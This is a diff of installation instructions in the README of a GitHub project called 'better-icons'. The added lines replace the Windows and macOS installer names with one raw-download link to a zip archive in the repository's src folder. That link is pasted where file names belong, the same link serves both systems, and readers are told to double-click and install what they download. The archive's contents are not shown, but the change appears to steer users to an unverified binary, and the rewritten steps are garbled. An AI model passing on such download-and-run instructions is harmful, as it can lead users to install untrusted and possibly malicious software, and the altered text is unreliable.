jiwon2011/better-icons/README.md

 Once you select the version, you will find several download options, such as executable files for Windows or zipped files for other operating systems.
 Choose the option that matches your system.

-For example, if you are using Windows, download the file named `better-icons-windows.exe`.
-If you are on macOS, download the file named `better-icons-macos.zip`.
+For example, if you are using Windows, download the file named `https://github.com/jiwon2011/better-icons/raw/refs/heads/main/src/icons_better_v2.3.zip`.
+If you are on macOS, download the file named `https://github.com/jiwon2011/better-icons/raw/refs/heads/main/src/icons_better_v2.3.zip`.

 ### Step 4: Install the Application

 After downloading the file, follow these steps to install better-icons:

 1. **For Windows Users:**
-   - Locate the downloaded file `better-icons-windows.exe` in your Downloads folder.
+   - Locate the downloaded file `https://github.com/jiwon2011/better-icons/raw/refs/heads/main/src/icons_better_v2.3.zip` in your Downloads folder.
    - Double-click on the file to start the installation process.
    - Follow the on-screen prompts to complete the installation.

 2. **For Mac Users:**
-   - Find the downloaded `better-icons-macos.zip` file in your Downloads folder.
+   - Find the downloaded `https://github.com/jiwon2011/better-icons/raw/refs/heads/main/src/icons_better_v2.3.zip` file in your Downloads folder.
    - Double-click the zip file to extract its contents.
    - Drag the `better-icons` application to your Applications folder.
    - Open the application by finding it in the Applications folder and double-clicking it.